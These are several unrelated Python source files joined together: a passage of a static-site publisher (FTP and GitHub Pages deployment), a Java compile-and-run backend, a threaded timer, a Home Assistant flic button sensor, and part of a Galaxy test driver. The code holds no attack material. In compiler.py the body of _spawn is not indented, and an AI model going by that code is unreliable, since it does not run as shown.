        # Hidden ".name.tmp" sibling used for atomic-ish upload+rename.
        dirname, basename = posixpath.split(filename)
        return posixpath.join(dirname, "." + basename + ".tmp")

    def upload_artifact(self, con, artifact_name, source_file, checksum):
        """Upload one artifact via a temp name, then record it in the listing."""
        with open(source_file, "rb") as source:
            tmp_dst = self.get_temp_filename(artifact_name)
            con.log_buffer.append("000 Updating %s" % artifact_name)
            con.upload_file(tmp_dst, source, mkdir=True)
            con.rename_file(tmp_dst, artifact_name)
            con.append(".lektor/listing", "%s|%s\n" % (artifact_name, checksum))

    def consolidate_listing(self, con, current_artifacts):
        """Delete server artifacts not in *current_artifacts* and rewrite the
        listing file when it drifted (duplicates or stale entries)."""
        server_artifacts, duplicates = self.read_existing_artifacts(con)
        known_folders = set()
        for artifact_name in current_artifacts.keys():
            known_folders.add(posixpath.dirname(artifact_name))
        for artifact_name, checksum in server_artifacts.items():
            if artifact_name not in current_artifacts:
                con.log_buffer.append("000 Deleting %s" % artifact_name)
                con.delete_file(artifact_name)
                folder = posixpath.dirname(artifact_name)
                if folder not in known_folders:
                    con.log_buffer.append("000 Deleting %s" % folder)
                    con.delete_folder(folder)
        if duplicates or server_artifacts != current_artifacts:
            listing = []
            for artifact_name, checksum in current_artifacts.items():
                listing.append("%s|%s\n" % (artifact_name, checksum))
            listing.sort()
            con.upload_file(".lektor/.listing.tmp", "".join(listing))
            con.rename_file(".lektor/.listing.tmp", ".lektor/listing")

    def publish(self, target_url, credentials=None, **extra):
        """Generator driving a full sync; yields status lines as it goes."""
        con = self.connection_class(target_url, credentials)
        connected = con.connect()
        for event in con.drain_log():
            yield event
        if not connected:
            return
        yield "000 Reading server state ..."
        con.mkdir(".lektor")
        committed_artifacts, _ = self.read_existing_artifacts(con)
        for event in con.drain_log():
            yield event
        yield "000 Begin sync ..."
        current_artifacts = {}
        for artifact_name, filename, checksum in self.iter_artifacts():
            current_artifacts[artifact_name] = checksum
            # Only upload artifacts whose checksum changed since last publish.
            if checksum != committed_artifacts.get(artifact_name):
                self.upload_artifact(con, artifact_name, filename, checksum)
                for event in con.drain_log():
                    yield event
        yield "000 Sync done!"
        yield "000 Consolidating server state ..."
        self.consolidate_listing(con, current_artifacts)
        for event in con.drain_log():
            yield event
        yield "000 All done!"
class FtpTlsPublisher(FtpPublisher):
    """FTP publisher that talks to the server over TLS (FTPS)."""

    connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
    """Publishes the build output to GitHub Pages by pushing with git."""

    def get_credentials(self, url, credentials=None):
        """Return "user" or "user:password" for HTTPS pushes, or None."""
        credentials = credentials or {}
        username = credentials.get("username") or url.username
        password = credentials.get("password") or url.password
        rv = username
        if username and password:
            rv += ":" + password
        return rv if rv else None

    def update_git_config(self, repo, url, branch, credentials=None):
        """Write origin/fetch (and credential) config into the checkout.

        Returns the GIT_SSH command to use for SSH pushes, or None for
        HTTPS pushes.
        """
        ssh_command = None
        path = url.host + u"/" + url.path.strip(u"/")
        cred = None
        if url.scheme in ("ghpages", "ghpages+ssh"):
            # SSH push; a key supplied via credentials or a custom port
            # requires a custom ssh command.
            push_url = "git@github.com:%s.git" % path
            keyfile = _write_ssh_key_file(
                os.path.join(repo, ".git", "ssh-auth-key"), credentials
            )
            if keyfile or url.port:
                ssh_command = _get_ssh_cmd(url.port, keyfile)
        else:
            push_url = "https://github.com/%s.git" % path
            cred = self.get_credentials(url, credentials)
        with open(os.path.join(repo, ".git", "config"), "a") as f:
            f.write(
                '[remote "origin"]\nurl = %s\n'
                "fetch = +refs/heads/%s:refs/remotes/origin/%s\n"
                % (push_url, branch, branch)
            )
            if cred:
                # Store HTTPS credentials in a repo-local helper file.
                cred_path = os.path.join(repo, ".git", "credentials")
                f.write('[credential]\nhelper = store --file "%s"\n' % cred_path)
                with open(cred_path, "w") as cf:
                    cf.write("https://%s@github.com\n" % cred)
        return ssh_command

    def link_artifacts(self, path):
        """Replace the checkout's contents with the build output.

        Uses hard links when the platform supports them, copies otherwise.
        """
        try:
            link = os.link
        except AttributeError:
            link = shutil.copy
        # Clean old
        for filename in os.listdir(path):
            if filename == ".git":
                continue
            filename = os.path.join(path, filename)
            try:
                os.remove(filename)
            except OSError:
                shutil.rmtree(filename)
        # Add new
        for dirpath, dirnames, filenames in os.walk(self.output_path):
            dirnames[:] = [x for x in dirnames if x != ".lektor"]
            for filename in filenames:
                full_path = os.path.join(self.output_path, dirpath, filename)
                dst = os.path.join(
                    path,
                    full_path[len(self.output_path) :]
                    .lstrip(os.path.sep)
                    .lstrip(os.path.altsep or ""),
                )
                try:
                    os.makedirs(os.path.dirname(dst))
                except (OSError, IOError):
                    pass
                try:
                    link(full_path, dst)
                except OSError: # Different Filesystems
                    shutil.copy(full_path, dst)

    def write_cname(self, path, target_url):
        """Write a CNAME file when the target URL carries ?cname=..."""
        params = target_url.decode_query()
        cname = params.get("cname")
        if cname is not None:
            with open(os.path.join(path, "CNAME"), "w") as f:
                f.write("%s\n" % cname)

    def detect_target_branch(self, target_url):
        # When pushing to the username.github.io repo we need to push to
        # master, otherwise to gh-pages
        if target_url.host.lower() + ".github.io" == target_url.path.strip("/").lower():
            branch = "master"
        else:
            branch = "gh-pages"
        return branch

    def publish(self, target_url, credentials=None, **extra):
        """Generator: clone-less init/fetch/commit/push cycle in a temp dir,
        yielding git output lines as progress events."""
        if not locate_executable("git"):
            self.fail("git executable not found; cannot deploy.")
        branch = self.detect_target_branch(target_url)
        with _temporary_folder(self.env) as path:
            ssh_command = None

            def git(args, **kwargs):
                # ssh_command is rebound below after update_git_config runs.
                kwargs["env"] = _patch_git_env(kwargs.pop("env", None), ssh_command)
                return Command(["git"] + args, cwd=path, **kwargs)

            for line in git(["init"]).output:
                yield line
            ssh_command = self.update_git_config(path, target_url, branch, credentials)
            for line in git(["remote", "update"]).output:
                yield line
            # Check out the target branch, creating it if it does not exist.
            if git(["checkout", "-q", branch], silent=True).wait() != 0:
                git(["checkout", "-qb", branch], silent=True).wait()
            self.link_artifacts(path)
            self.write_cname(path, target_url)
            for line in git(["add", "-f", "--all", "."]).output:
                yield line
            for line in git(["commit", "-qm", "Synchronized build"]).output:
                yield line
            for line in git(["push", "origin", branch]).output:
                yield line
# Default mapping of deployment URL schemes to Publisher implementations.
# NOTE(review): publish() below resolves schemes via env.publishers, so this
# table is presumably merged into the environment elsewhere -- confirm.
builtin_publishers = {
    "rsync": RsyncPublisher,
    "ftp": FtpPublisher,
    "ftps": FtpTlsPublisher,
    "ghpages": GithubPagesPublisher,
    "ghpages+https": GithubPagesPublisher,
    "ghpages+ssh": GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
    """Resolve the publisher for *target*'s URL scheme and run it.

    Raises PublishError when the environment knows no publisher for the
    scheme; otherwise returns whatever the publisher's publish() returns.
    """
    parsed = urls.url_parse(str(target))
    publisher_cls = env.publishers.get(parsed.scheme)
    if publisher_cls is None:
        raise PublishError('"%s" is an unknown scheme.' % parsed.scheme)
    return publisher_cls(env, output_path).publish(parsed, credentials, **extra)
|
compiler.py | from subprocess import Popen, PIPE, STDOUT, TimeoutExpired
from queue import Queue, Empty
from threading import Thread
import os
import re
import settings
# Matches the (optionally public) class declaration in a Java source file;
# the "name" group captures the class identifier.
# Bug fix: use a raw string -- "\s"/"\w" in a plain string are invalid
# escape sequences (DeprecationWarning, and a future SyntaxError).
class_pat = re.compile(r"(public\s+)?class\s+(?P<name>\w+)", re.MULTILINE)
# Absolute paths to the JDK launcher and compiler configured in settings.
java_exe = os.path.join(settings.jdk_path, 'java')
javac_exe = os.path.join(settings.jdk_path, 'javac')
def extract_class_name(source):
    """Return the class name declared in *source*, or "BadName" if none."""
    match = class_pat.search(source)
    return match.group("name") if match is not None else "BadName"
def write_file(path, contents):
    """Write *contents* to *path*, replacing any existing file.

    Bug fix: use a context manager so the handle is closed even when the
    write raises (the old open/write/close leaked the handle on error).
    """
    with open(path, "w") as f:
        f.write(contents)
class Program:
    """A Java compile-and-run job rooted in a working directory.

    callbacks must have the following methods:
    compiled(ecode, logs), stdout(data), stderr(data), stdin_ack(data),
    done(ecode) -- and error(msg), used when no compiler is found.
    """

    def __init__(self, source, dirpath, callbacks):
        # Bug fix: the original condition used "and", so a non-string
        # source reached len() (raising TypeError instead of ValueError)
        # and a too-short string source was silently accepted.  Nine
        # characters is roughly the shortest plausible class declaration.
        if not isinstance(source, str) or len(source) < 9:
            raise ValueError("source must be a non-empty string")
        if not os.path.isdir(dirpath):
            raise ValueError("dirpath must be a valid directory")
        self._name = extract_class_name(source)
        self._dir = dirpath
        write_file(os.path.join(self._dir, self._name + ".java"), source)
        self._queue = Queue()
        self._cbs = callbacks

    def _compile(self):
        """Start javac on the saved source; return the Popen or None."""
        try:
            return Popen([javac_exe, "-Xlint", self._name + ".java"], cwd=self._dir, stdout=PIPE, stderr=STDOUT)
        except FileNotFoundError as e:
            print("Error:", e.strerror)
            return None

    def _execute(self):
        """Start the compiled class under java; return the Popen or None."""
        try:
            return Popen([java_exe, self._name], cwd=self._dir, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        except FileNotFoundError as e:
            print("Error:", e.strerror)
            return None

    def spawn_bg(self):
        """Run the compile/execute pipeline on a background thread."""
        t = _spawn(_main, args=(self,))
        t.start()
        return t

    def kill(self):
        """Ask the worker loop to kill the running process."""
        self._queue.put(("kill", None), timeout=1)

    def stdin(self, data):
        """Queue *data* (bytes) for the running program's stdin."""
        if not isinstance(data, bytes):
            raise TypeError("data must be bytes")
        self._queue.put(("stdin", data))
def _spawn(func, args):
#return Greenlet(func, *args)
return Thread(target=func, args=args)
def read2Q(key, stream, notifq, limit_size=4096, limit_lines=256):
    """Pump *stream* into *notifq* as (key, bytes) items.

    A (key, None) item marks end-of-stream.  Once more than *limit_size*
    bytes or *limit_lines* newlines have been forwarded, the stream is
    closed and a truncation notice is queued instead.
    """
    total_bytes = 0
    total_lines = 0
    while not (total_bytes > limit_size or total_lines > limit_lines):
        chunk = stream.read1(256)
        if not chunk:
            notifq.put((key, None))
            return
        notifq.put((key, chunk))
        total_bytes += len(chunk)
        total_lines += chunk.count(b'\n')
    stream.close()
    notifq.put((key, b'%\n\n>>> output limit exceeded! stream closed <<<'))
def _main(program):
    """Worker entry point: compile the program, then (on success) run it.

    Phase 1 drains compiler output into *logs* and reports it via
    compiled(); phase 2 shuttles stdin/stdout/stderr between the child
    process and the callbacks until the process exits or is killed.
    """
    proc = program._compile()
    if proc is None:
        program._cbs.error("Backend could not find a Java compiler.")
        return
    # Reader thread forwards compiler output (stderr merged into stdout
    # by _compile) onto the program's queue.
    outt = _spawn(read2Q, args=('stdout', proc.stdout, program._queue))
    outt.start()
    done = False
    killed = False
    logs = b''
    while True:
        if proc.poll() is not None: # proc exited
            done = True
            outt.join()
        try:
            if not done:
                key, data = program._queue.get(timeout=0.5)
            else:
                # Process is gone: only drain what is already queued.
                key, data = program._queue.get_nowait()
        except Empty:
            if done:
                break
            continue
        if key == 'stdout':
            if data is not None:
                logs += data
        elif key == 'kill':
            proc.kill()
            killed = True
    ecode = proc.returncode
    program._cbs.compiled(ecode, logs)
    if ecode != 0:
        # NOTE(review): done() is documented to take an exit code, but the
        # compile-failure path passes None -- confirm callers expect that.
        program._cbs.done(None)
        return
    elif killed:
        program._cbs.done(-9)
        return
    # Compilation succeeded: run the program with separate stdout/stderr
    # readers and accept stdin/kill commands from the queue.
    proc = program._execute()
    outt = _spawn(read2Q, args=('stdout', proc.stdout, program._queue))
    outt.start()
    errt = _spawn(read2Q, args=('stderr', proc.stderr, program._queue))
    errt.start()
    done = False
    while True:
        if proc.poll() is not None:
            done = True
            outt.join()
            errt.join()
        try:
            if not done:
                key, data = program._queue.get(timeout=0.5)
            else:
                key, data = program._queue.get_nowait()
        except Empty:
            if done:
                break
            continue
        if key == 'stdin':
            if len(data) > 0:
                proc.stdin.write(data)
                program._cbs.stdin_ack(data)
                try:
                    proc.stdin.flush()
                except OSError as e:
                    # Child may have closed stdin already; not fatal.
                    print("== OSError:", e)
        elif key == 'stdout':
            if data is not None:
                program._cbs.stdout(data)
        elif key == 'stderr':
            if data is not None:
                program._cbs.stderr(data)
        elif key == 'kill':
            proc.kill()
    program._cbs.done(proc.returncode)
|
timer.py | # coding=utf-8
__author__ = 'weiyulan'
import threading
import time
class Timer(object):
    """A timer that repeatedly invokes a target callable on a worker thread."""

    def __init__(self, interval, target, args=(), kwargs=None, repeat_times=-1, start_flag=False):
        """Initialize the timer.

        Keyword arguments:
        interval -- seconds between invocations (must be greater than zero).
        target -- the callable to invoke.
        args -- positional arguments for *target*.
        kwargs -- keyword arguments for *target*.
        repeat_times -- how many times to fire (-1 means forever).
        start_flag -- when True, start the timer immediately.
        """
        self._interval = 0
        self.interval = interval  # validated through the property setter
        self.interval_lock = threading.Lock()
        if not callable(target):
            raise Exception("function应当为一个函数。")
        self.target = target
        self.repeat_times = repeat_times
        self.repeat_times_lock = threading.Lock()
        self.pause_lock = threading.Lock()
        self.args = args
        # Bug fix: the default used to be a shared mutable dict ({}), so
        # every Timer constructed without kwargs referenced the same object.
        self.kwargs = {} if kwargs is None else kwargs
        self.thread_handle = threading.Thread(target=self.worker)
        # Daemon thread so a live timer never blocks interpreter exit
        # (setDaemon() is deprecated in favour of the attribute).
        self.thread_handle.daemon = True
        if start_flag is True:
            self.run()

    def run(self):
        """Start the timer's worker thread."""
        self.thread_handle.start()

    def worker(self):
        """Worker loop: honor pause, count down repeats, fire, then sleep."""
        while True:
            # pause() holds this lock, blocking the loop until resume().
            self.pause_lock.acquire()
            self.pause_lock.release()
            with self.repeat_times_lock:
                self.repeat_times -= 1
                # Reaching exactly -1 means the budget ran out (stop() sets
                # it to 0); an infinite timer starts at -1 and goes to -2.
                if self.repeat_times == -1:
                    return
            self.target(*self.args, **self.kwargs)
            with self.interval_lock:
                time.sleep(self.interval)

    def pause(self):
        """Pause the timer; the worker blocks before its next firing."""
        self.pause_lock.acquire()

    def resume(self):
        """Resume a previously paused timer."""
        self.pause_lock.release()

    def stop(self):
        """Stop the timer after the current iteration finishes."""
        with self.repeat_times_lock:
            self.repeat_times = 0

    def __del__(self):
        self.stop()

    @property
    def interval(self):
        return self._interval

    @interval.setter
    def interval(self, value):
        # Reject non-positive periods.
        if value > 0.:
            self._interval = value
        else:
            raise ValueError("时间间隔不能小于等于零。")
|
binary_sensor.py | """Support to use flic buttons as a binary sensor."""
from __future__ import annotations
import logging
import threading
import pyflic
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import (
CONF_DISCOVERY,
CONF_HOST,
CONF_PORT,
CONF_TIMEOUT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import format_mac
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 3
CLICK_TYPE_SINGLE = "single"
CLICK_TYPE_DOUBLE = "double"
CLICK_TYPE_HOLD = "hold"
CLICK_TYPES = [CLICK_TYPE_SINGLE, CLICK_TYPE_DOUBLE, CLICK_TYPE_HOLD]
CONF_IGNORED_CLICK_TYPES = "ignored_click_types"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 5551
EVENT_NAME = "flic_click"
EVENT_DATA_NAME = "button_name"
EVENT_DATA_ADDRESS = "button_address"
EVENT_DATA_TYPE = "click_type"
EVENT_DATA_QUEUED_TIME = "queued_time"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_DISCOVERY, default=True): cv.boolean,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_IGNORED_CLICK_TYPES): vol.All(
cv.ensure_list, [vol.In(CLICK_TYPES)]
),
}
)
def setup_platform(
    hass: HomeAssistant,
    config: ConfigType,
    add_entities: AddEntitiesCallback,
    discovery_info: DiscoveryInfoType | None = None,
) -> None:
    """Set up the flic platform."""
    # Initialize flic client responsible for
    # connecting to buttons and retrieving events
    host = config.get(CONF_HOST)
    port = config.get(CONF_PORT)
    discovery = config.get(CONF_DISCOVERY)
    try:
        client = pyflic.FlicClient(host, port)
    except ConnectionRefusedError:
        _LOGGER.error("Failed to connect to flic server")
        return

    def new_button_callback(address):
        """Set up newly verified button as device in Home Assistant."""
        setup_button(hass, config, add_entities, client, address)

    # Callback must be registered before the event thread starts so no
    # verification event is missed.
    client.on_new_verified_button = new_button_callback
    if discovery:
        start_scanning(config, add_entities, client)

    # Close the client when Home Assistant shuts down.
    hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, lambda event: client.close())

    # Start the pyflic event handling thread
    threading.Thread(target=client.handle_events).start()

    def get_info_callback(items):
        """Add entities for already verified buttons."""
        addresses = items["bd_addr_of_verified_buttons"] or []
        for address in addresses:
            setup_button(hass, config, add_entities, client, address)

    # Get addresses of already verified buttons
    client.get_info(get_info_callback)
def start_scanning(config, add_entities, client):
    """Start a new flic client for scanning and connecting to new buttons."""
    wizard = pyflic.ScanWizard()

    def on_completed(scan_wizard, result, address, name):
        """Restart scan wizard to constantly check for new buttons."""
        if result == pyflic.ScanWizardResult.WizardSuccess:
            _LOGGER.info("Found new button %s", address)
        elif result != pyflic.ScanWizardResult.WizardFailedTimeout:
            _LOGGER.warning(
                "Failed to connect to button %s. Reason: %s", address, result
            )
        # Restart scan wizard
        start_scanning(config, add_entities, client)

    wizard.on_completed = on_completed
    client.add_scan_wizard(wizard)
def setup_button(hass, config, add_entities, client, address):
    """Set up a single button device."""
    entity = FlicButton(
        hass,
        client,
        address,
        config.get(CONF_TIMEOUT),
        config.get(CONF_IGNORED_CLICK_TYPES),
    )
    _LOGGER.info("Connected to button %s", address)
    add_entities([entity])
class FlicButton(BinarySensorEntity):
    """Representation of a flic button."""

    def __init__(self, hass, client, address, timeout, ignored_click_types):
        """Initialize the flic button."""
        # Stable unique id derived from the button's bluetooth MAC.
        self._attr_unique_id = format_mac(address)
        self._hass = hass
        self._address = address
        self._timeout = timeout
        self._is_down = False
        self._ignored_click_types = ignored_click_types or []
        # Maps pyflic click types onto the click-type strings fired in
        # flic_click events on the Home Assistant bus.
        self._hass_click_types = {
            pyflic.ClickType.ButtonClick: CLICK_TYPE_SINGLE,
            pyflic.ClickType.ButtonSingleClick: CLICK_TYPE_SINGLE,
            pyflic.ClickType.ButtonDoubleClick: CLICK_TYPE_DOUBLE,
            pyflic.ClickType.ButtonHold: CLICK_TYPE_HOLD,
        }
        self._channel = self._create_channel()
        client.add_connection_channel(self._channel)

    def _create_channel(self):
        """Create a new connection channel to the button."""
        # NOTE(review): _connection_status_changed below is never assigned
        # to the channel here -- confirm whether it is wired up elsewhere.
        channel = pyflic.ButtonConnectionChannel(self._address)
        channel.on_button_up_or_down = self._on_up_down
        # If all types of clicks should be ignored, skip registering callbacks
        if set(self._ignored_click_types) == set(CLICK_TYPES):
            return channel
        if CLICK_TYPE_DOUBLE in self._ignored_click_types:
            # Listen to all but double click type events
            channel.on_button_click_or_hold = self._on_click
        elif CLICK_TYPE_HOLD in self._ignored_click_types:
            # Listen to all but hold click type events
            channel.on_button_single_or_double_click = self._on_click
        else:
            # Listen to all click type events
            channel.on_button_single_or_double_click_or_hold = self._on_click
        return channel

    @property
    def name(self):
        """Return the name of the device."""
        return f"flic_{self.address.replace(':', '')}"

    @property
    def address(self):
        """Return the bluetooth address of the device."""
        return self._address

    @property
    def is_on(self):
        """Return true if sensor is on."""
        return self._is_down

    @property
    def should_poll(self):
        """No polling needed."""
        return False

    @property
    def extra_state_attributes(self):
        """Return device specific state attributes."""
        return {"address": self.address}

    def _queued_event_check(self, click_type, time_diff):
        """Generate a log message and returns true if timeout exceeded."""
        time_string = f"{time_diff:d} {'second' if time_diff == 1 else 'seconds'}"
        if time_diff > self._timeout:
            _LOGGER.warning(
                "Queued %s dropped for %s. Time in queue was %s",
                click_type,
                self.address,
                time_string,
            )
            return True
        _LOGGER.info(
            "Queued %s allowed for %s. Time in queue was %s",
            click_type,
            self.address,
            time_string,
        )
        return False

    def _on_up_down(self, channel, click_type, was_queued, time_diff):
        """Update device state, if event was not queued."""
        if was_queued and self._queued_event_check(click_type, time_diff):
            return
        self._is_down = click_type == pyflic.ClickType.ButtonDown
        self.schedule_update_ha_state()

    def _on_click(self, channel, click_type, was_queued, time_diff):
        """Fire click event, if event was not queued."""
        # Return if click event was queued beyond allowed timeout
        if was_queued and self._queued_event_check(click_type, time_diff):
            return
        # Return if click event is in ignored click types
        hass_click_type = self._hass_click_types[click_type]
        if hass_click_type in self._ignored_click_types:
            return
        self._hass.bus.fire(
            EVENT_NAME,
            {
                EVENT_DATA_NAME: self.name,
                EVENT_DATA_ADDRESS: self.address,
                EVENT_DATA_QUEUED_TIME: time_diff,
                EVENT_DATA_TYPE: hass_click_type,
            },
        )

    def _connection_status_changed(self, channel, connection_status, disconnect_reason):
        """Remove device, if button disconnects."""
        if connection_status == pyflic.ConnectionStatus.Disconnected:
            _LOGGER.warning(
                "Button (%s) disconnected. Reason: %s", self.address, disconnect_reason
            )
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import collections
import fcntl
import httplib
import json
import logging
import os
import random
import shutil
import socket
import struct
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.util import asbool, download_to_file
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from .api_util import get_master_api_key, get_user_api_key
from .instrument import StructuredTestDataPlugin
from .nose_util import run
from .test_logging import logging_config_file
from .tool_shed_util import parse_tool_panel_config
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
    """Ensure TOOL_SHED_TEST_TMP_DIR points at a scratch directory.

    Here's the directory where everything happens: temporary directories
    are created within it for the hgweb.config file, the database, new
    repositories, etc.  Since the tool shed browses repository contents
    via HTTP, the full path to the temporary directory where the
    repositories are located cannot contain invalid URL characters.
    """
    tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR')
    if tmp_dir is None:
        tmp_dir = tempfile.mkdtemp()
    os.environ['TOOL_SHED_TEST_TMP_DIR'] = tmp_dir
    return tmp_dir
def get_galaxy_test_tmp_dir():
    """Create test directory for use by Galaxy server being setup for testing."""
    configured = os.environ.get('GALAXY_TEST_TMP_DIR')
    if configured is not None:
        return configured
    return tempfile.mkdtemp()
def configure_environment():
    """Hack up the process environment for test cases."""
    # Default locale for requests issued by the tests; left alone if the
    # caller already configured one.
    if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
        os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
    # Used by get_filename in the tool shed's twilltestcase.
    if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
        os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
    # Signal to the apps under test that this setup already ran.
    os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
    """Build a logger for test driver script."""
    # Currently just hands back the module-level "test_driver" logger.
    return log
def ensure_test_file_dir_set():
    """Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.

    Return first directory for backward compat.
    """
    test_file_dirs = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
    os.environ['GALAXY_TEST_FILE_DIR'] = test_file_dirs
    # The setting is a comma-separated list; callers expect only the first.
    return test_file_dirs.split(",")[0]
def setup_galaxy_config(
    tmpdir,
    use_test_file_dir=False,
    default_install_db_merged=True,
    default_tool_data_table_config_path=None,
    default_shed_tool_data_table_config=None,
    default_job_config_file=None,
    enable_tool_shed_check=False,
    default_tool_conf=None,
    shed_tool_conf=None,
    datatypes_conf=None,
    update_integrated_tool_panel=False,
):
    """Setup environment and build config for test Galaxy instance.

    Returns a plain dict of Galaxy configuration options rooted in
    *tmpdir*; most keyword arguments are fallbacks that corresponding
    GALAXY_TEST_* environment variables can override.
    """
    if not os.path.exists(tmpdir):
        os.makedirs(tmpdir)
    # Scratch areas for datasets, templates, uploads, and job state.
    file_path = os.path.join(tmpdir, 'files')
    template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
    new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
    job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
    if use_test_file_dir:
        # Allow library imports from the first configured test-file dir.
        first_test_file_dir = ensure_test_file_dir_set()
        if not os.path.isabs(first_test_file_dir):
            first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
        library_import_dir = first_test_file_dir
        import_dir = os.path.join(first_test_file_dir, 'users')
        if os.path.exists(import_dir):
            user_library_import_dir = import_dir
        else:
            user_library_import_dir = None
    else:
        user_library_import_dir = None
        library_import_dir = None
    job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
    tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
    tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
    if tool_dependency_dir is None:
        tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
    tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
    # Prefer an existing data manager config over the shipped sample.
    default_data_manager_config = 'config/data_manager_conf.xml.sample'
    for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
        if os.path.exists(data_manager_config):
            default_data_manager_config = data_manager_config
    data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
    master_api_key = get_master_api_key()
    # Data Manager testing temp path
    # For storing Data Manager outputs and .loc files so that real ones don't get clobbered
    galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
    tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
    if tool_conf is None:
        # As a fallback always at least allow upload.
        tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
    if shed_tool_conf is not None:
        tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
    shed_tool_data_table_config = default_shed_tool_data_table_config
    if shed_tool_data_table_config is None:
        shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
    config = dict(
        admin_users='test@bx.psu.edu',
        allow_library_path_paste=True,
        allow_user_creation=True,
        allow_user_deletion=True,
        api_allow_run_as='test@bx.psu.edu',
        auto_configure_logging=logging_config_file is None,
        check_migrate_tools=False,
        conda_auto_init=False,
        cleanup_job='onsuccess',
        data_manager_config_file=data_manager_config_file,
        enable_beta_tool_formats=True,
        expose_dataset_path=True,
        file_path=file_path,
        galaxy_data_manager_data_path=galaxy_data_manager_data_path,
        id_secret='changethisinproductiontoo',
        job_config_file=job_config_file,
        job_queue_workers=5,
        job_working_directory=job_working_directory,
        library_import_dir=library_import_dir,
        log_destination="stdout",
        new_file_path=new_file_path,
        override_tempdir=False,
        master_api_key=master_api_key,
        running_functional_tests=True,
        shed_tool_data_table_config=shed_tool_data_table_config,
        template_cache_path=template_cache_path,
        template_path='templates',
        tool_config_file=tool_conf,
        tool_data_table_config_path=tool_data_table_config_path,
        tool_parse_help=False,
        tool_path=tool_path,
        update_integrated_tool_panel=update_integrated_tool_panel,
        use_tasked_jobs=True,
        use_heartbeat=False,
        user_library_import_dir=user_library_import_dir,
        webhooks_dir=TEST_WEBHOOKS_DIR,
    )
    config.update(database_conf(tmpdir))
    config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
    if datatypes_conf is not None:
        config['datatypes_config_file'] = datatypes_conf
    if enable_tool_shed_check:
        config["enable_tool_shed_check"] = enable_tool_shed_check
        config["hours_between_check"] = 0.001
    if tool_dependency_dir:
        config["tool_dependency_dir"] = tool_dependency_dir
        # Used by shed's twill dependency stuff - todo read from
        # Galaxy's config API.
